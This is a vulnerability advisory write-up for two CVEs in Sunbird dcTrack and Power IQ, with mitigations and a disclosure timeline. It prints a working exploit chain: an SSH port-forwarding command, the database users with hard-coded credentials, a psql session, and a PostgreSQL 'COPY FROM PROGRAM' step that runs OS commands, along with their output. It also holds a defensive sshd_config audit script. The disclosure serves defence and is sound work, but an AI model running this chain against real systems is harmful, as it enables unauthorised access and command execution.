CVE-2025-66238 and CVE-2025-66237
CISA ICS Advisory
Summary
The DCIM dcTrack platform is affected by two vulnerabilities that allow an authenticated user to escape its restricted SSH shell. The first is a misconfiguration that permits SSH port forwarding, enabling access to internal services that should not be reachable. The second is the presence of hard-coded credentials for the platform’s internal PostgreSQL database. Together, these issues allow a restricted user to break out of the limited shell environment and execute arbitrary commands on the underlying system.
Versions Impacted
The products affected are:
| Vendor | Product | Version Impacted |
|---|---|---|
| Sunbird | DCIM dcTrack | < 9.2.3 |
| Sunbird | Power IQ | < 9.2.1 |
Vulnerability Details
CVE-2025-66238
The restricted shell that the affected platforms expose over SSH is intended to limit users and administrators to a narrow, controlled command set. However, SSH port forwarding is not disabled for these accounts. As a result, an authenticated user or administrator can establish local or remote port-forwarding tunnels to services bound only to the host's internal interfaces.
This vulnerability can be reproduced with an SSH client by connecting to the target Sunbird DCIM dcTrack server and forwarding a local port to the Postgres database, for example:
ssh config@TARGET_IP -L 5432:localhost:5432
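The condition above is an sshd configuration question: does any `Match` block for the restricted account turn forwarding off, or does it inherit sshd's global default of `AllowTcpForwarding yes`? As an added example (not part of the advisory or of the vendor's code), the following Python audit models sshd's precedence rules (first applicable Match block, then the global section, then the built-in default) and reports the tunnelling options that would apply to a given account; the `config` user name is taken from the advisory's example command, the two sshd_config snippets are constructed, and only the `User` and `Group` Match criteria are modelled.

```python
import fnmatch

# Defaults applied by sshd when a keyword is set nowhere (see sshd_config(5)).
DEFAULTS = {"allowtcpforwarding": "yes", "permittunnel": "no", "x11forwarding": "no"}

def parse_sshd_config(text):
    """Return (global_opts, [(criteria, opts), ...]); first value per keyword wins, as in sshd."""
    global_opts, blocks, current = {}, [], None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split(None, 1)
        key, value = parts[0].lower(), (parts[1].strip() if len(parts) > 1 else "")
        if key == "match":  # start a new conditional block
            toks = value.split()
            criteria = {n.lower(): v.split(",") for n, v in zip(toks[0::2], toks[1::2])}
            current = (criteria, {})
            blocks.append(current)
            continue
        (current[1] if current else global_opts).setdefault(key, value.lower())
    return global_opts, blocks

def block_applies(criteria, user, groups=()):
    """True if every Match criterion holds; only User and Group are modelled (assumption)."""
    for name, patterns in criteria.items():
        subjects = [user] if name == "user" else (list(groups) if name == "group" else [])
        if not any(fnmatch.fnmatchcase(s, p) for s in subjects for p in patterns):
            return False
    return True

def effective_option(text, user, keyword, groups=()):
    """First applicable Match block that sets the keyword, else global section, else default."""
    keyword = keyword.lower()
    global_opts, blocks = parse_sshd_config(text)
    for criteria, opts in blocks:
        if keyword in opts and block_applies(criteria, user, groups):
            return opts[keyword]
    return global_opts.get(keyword, DEFAULTS.get(keyword))

def audit_forwarding(text, user, groups=()):
    """Effective value of each tunnelling-related option for one account."""
    return {k: effective_option(text, user, k, groups) for k in DEFAULTS}

# Constructed sample: the restricted account's Match block is silent on forwarding,
# so sshd's global default (AllowTcpForwarding yes) applies to it.
WEAK_CONFIG = "Port 22\nPasswordAuthentication yes\nMatch User config\n    PasswordAuthentication yes\n"
# Constructed sample: the same block with tunnelling explicitly denied.
HARDENED_CONFIG = WEAK_CONFIG + "    AllowTcpForwarding no\n    PermitTunnel no\n    X11Forwarding no\n"
```

On a real appliance, `audit_forwarding(open("/etc/ssh/sshd_config").read(), "config")` returning anything other than `no` for `allowtcpforwarding` reproduces the condition this section describes.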
CVE-2025-66237
The platform embeds hard-coded credentials for its internal PostgreSQL instance. When combined with SSH port forwarding (CVE-2025-66238), an authenticated restricted-shell user can connect directly to this database from their local machine.
Multiple database users used by the platform (odbcuser, raritan and dctrack) rely on default, hard-coded credentials.
Because the PostgreSQL configuration permits execution pathways that reach the underlying operating system, this access can be leveraged to escape the restricted shell and execute arbitrary commands on the host.
This vulnerability can be reproduced with a Postgres database client using the following parameters:
- Port: tcp/5432
- Database name: raritan
- Database users: odbcuser, raritan, dctrack
Impact
By exploiting CVE-2025-66238, an attacker can leverage SSH port forwarding to reach backend services on local TCP sockets, escape the restricted shell, and gain access to the platform's internal PostgreSQL database for privilege escalation.
As an example, the following internal services used by the platform become reachable:
tcp 0 0 127.0.0.1:4949 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:5432 0.0.0.0:* LISTEN 1246/postmaster
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::5432 :::* LISTEN 1246/postmaster
tcp6 0 0 :::443 :::* LISTEN -
tcp6 0 0 :::8161 :::* LISTEN -
tcp6 0 0 127.0.0.1:8005 :::* LISTEN -
tcp6 0 0 :::36463 :::* LISTEN -
tcp6 0 0 :::61616 :::* LISTEN -
tcp6 0 0 :::8080 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
With CVE-2025-66237, an attacker who obtains the hard-coded PostgreSQL credentials can take full control of the database, escalate privileges on the platform, and ultimately execute system commands on the host.
This can be used to access the database that stores the platform's configuration, data and authentication details:
$ psql -h 127.0.0.1 -U raritan raritan
psql (14.15 (Ubuntu 14.15-0ubuntu0.22.04.1), server 12.9)
Type "help" for help.
raritan=# \list
List of databases
Name | Owner | Encoding | Collate | Ctype | Access privileges
-----------+----------+----------+-------------+-------------+-----------------------
postgres | postgres | UTF8 | C | C |
raritan | raritan | UTF8 | en_US.UTF-8 | en_US.UTF-8 |
template0 | postgres | UTF8 | C | C | =c/postgres +
| | | | | postgres=CTc/postgres
template1 | postgres | UTF8 | C | C | =c/postgres +
| | | | | postgres=CTc/postgres
(4 rows)
raritan=# \c raritan
psql (14.15 (Ubuntu 14.15-0ubuntu0.22.04.1), server 12.9)
You are now connected to database "raritan" as user "raritan".
raritan=# SELECT table_name FROM information_schema.tables WHERE table_schema = 'public';
table_name
-----------------------------------------------------------
audit_log_cursors
audit_logs
batch_job_execution
batch_job_execution_context
batch_job_execution_params
batch_job_instance
batch_step_execution
configuratr_settings
cron_task_schedules
dashboardr_poweriq_credentials
databasechangelog
databasechangeloglock
dct_model_aliases
rails_options
rails_options_old
rbac_items
rbac_lks
rbac_objects
rbac_permissions
rbac_role_privileges
rbac_roles
roles
roles_user_groups
roles_users
saml_configurations
user_group_members
user_groups
user_prefs
users
[TRIMMED_OUTPUT]
(293 rows)
Additionally, system commands can be run on the host OS (thus bypassing the restricted shell imposed on platform owners) using techniques such as:
CREATE TABLE temp(t text);
COPY temp FROM PROGRAM 'ps -aux';
SELECT * FROM temp LIMIT 1000 OFFSET 0;
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 238644 6812 ? Ss Jan30 1:48 /usr/lib/systemd/systemd --switched-root --system --deserialize 16
root 2 0.0 0.0 0 0 ? S Jan30 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? I< Jan30 0:00 [rcu_gp]
root 1056 0.1 0.1 374312 8532 ? Ss Jan30 17:37 /usr/bin/perl -w /usr/local/sbin/hc.pl
nginx 1059 0.0 0.7 589920 61780 ? Sl Jan30 1:09 /opt/sunbird/appliance_manager/vendor/bundle/ruby/3.1.0/bin/rake qc:work
nginx 1060 0.0 0.7 589924 61884 ? Sl Jan30 1:08 /opt/sunbird/appliance_manager/vendor/bundle/ruby/3.1.0/bin/rake qc:work
nginx 1061 0.0 0.7 589952 61276 ? Sl Jan30 1:08 /opt/sunbird/appliance_manager/vendor/bundle/ruby/3.1.0/bin/rake qc:work
config 1407704 0.0 0.0 235960 5184 pts/0 Ss+ 16:19 0:00 /usr/bin/perl -w /usr/local/sbin/config.pl
root 1407706 0.0 0.0 337252 7744 pts/0 S+ 16:19 0:00 /usr/bin/sudo /usr/local/sbin/serial-config.pl /var/log/oculan/serial-config.log
root 1407707 0.0 0.4 327936 37284 pts/0 S+ 16:19 0:00 /usr/bin/perl -w /usr/local/sbin/serial-config.pl /var/log/oculan/serial-config.log
postgres 1407812 0.0 0.1 1426564 12292 ? Ss 16:19 0:00 postgres: dctrack raritan 127.0.0.1(38636) idle
postgres 1407814 0.0 0.2 1428104 23220 ? Ss 16:19 0:00 postgres: raritan raritan 127.0.0.1(40498) idle
postgres 1408621 0.0 0.0 262548 3940 ? R 16:29 0:00 ps -aux
[TRIMMED_OUTPUT]
Recommended Mitigations
As CISA recommends in ICSA-25-338-05, administrators of these platforms are urged to take defensive measures to minimize the risk of exploitation of these vulnerabilities, such as:
- Restrict network access to these platforms' administrative services over SSH.
- Rotate the default SSH password for the administrative user config.
- Update to version 9.2.3 (dcTrack) or 9.2.1 (Power IQ).
Disclosure Timeline
| Date | Event |
|---|---|
| Feb 16, 2025 | Case opened with CERT Coordination Center (CERT/CC). |
| Feb 25, 2025 | CISA ICS coordinator assigned. |
| Feb 26, 2025 | Sunbird Software joins the case. |
| Dec 4, 2025 | CISA ICS publishes ICSA-25-338-05. |
| Dec 4, 2025 | Responsible public disclosure of details. |
Acknowledgements
A shout out to the Technical Editors and Writers at CISA Industrial Control Systems Vulnerability Management and Coordination, as well as the engineers at Sunbird Software, for their prompt communication and their assistance in disclosing the issue.